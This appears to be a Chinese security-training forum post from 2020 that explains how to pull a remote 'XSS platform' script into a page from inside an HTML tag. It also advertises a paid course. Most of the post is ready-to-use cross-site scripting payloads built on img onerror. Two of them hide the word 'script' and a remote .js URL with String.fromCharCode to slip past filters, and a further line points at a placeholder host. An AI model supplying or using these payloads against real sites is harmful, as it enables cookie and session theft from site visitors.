|
|
XSS漏洞如何在标签内调用xss平台链接
<iMg/sRc=1 onerror=1=//www.xxx.com/xxx.js>
今天有学员问如何在标签内调用XSS平台链接,问这样在标签内写上js的网址可以执行吗?答:不行,因为onerror内联事件,写javascript语法。
解决办法:
<img/src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)">
无引号版payload:
<img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)})()>
ZP培训:https://www.zygx8.com/thread-10128-1-1.html
课程截图:
|
|
发表于 2020-3-6 17:53:13
楼主
